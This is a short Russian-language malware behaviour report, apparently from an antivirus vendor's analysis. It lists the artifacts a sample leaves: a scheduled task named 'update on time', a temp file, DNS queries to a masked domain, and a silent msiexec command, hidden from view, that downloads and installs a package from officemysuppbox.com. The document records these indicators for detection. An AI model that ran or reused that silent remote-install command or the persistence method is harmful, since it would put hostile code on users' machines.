Техническая информация
- <SYSTEM32>\tasks\update on time
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1936
- %TEMP%\690990.cvr
- 'of####mysuppbox.com':80
- DNS ASK of####mysuppbox.com
- '<SYSTEM32>\msiexec.exe' urk=yahoo url=com /q /norestart /i http://officemysuppbox.com/staterepository' (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {63FB813F-99E0-4D71-BDE1-DAC0E36AF793} S-1-5-21-1238866942-1249195528-555854008-1000:rwwuwzanan\user:Interactive:[1]
- '<SYSTEM32>\msiexec.exe' urk=yahoo url=com /q /norestart /i http://officemysuppbox.com/staterepository